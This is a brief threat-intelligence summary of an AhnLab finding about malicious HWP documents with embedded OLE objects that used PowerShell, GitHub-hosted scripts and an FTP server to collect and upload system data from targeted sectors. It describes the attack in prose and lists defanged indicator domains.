AhnLab identified malicious HWP documents embedded with OLE objects and aimed at people in sectors including national defense, unification, education, and the press. One document type triggered external URLs through oversized embedded OLE objects, while another created batch and text files in the temporary folder and used PowerShell to fetch scripts from GitHub. The scripts collected recent-file lists, network configuration, and running processes, stored the results under the user's AppData path, and uploaded them to an attacker-controlled FTP server. Persistence was maintained by creating an LNK file in the Startup folder that re-executed a PowerShell command to retrieve the GitHub-hosted script after reboot. The infrastructure cited includes host.sharingdocument[.]one, mail.smartprivacyc[.]com, raw.githubusercontent[.]com/babaramam/repo, and plm.myartsonline[.]com.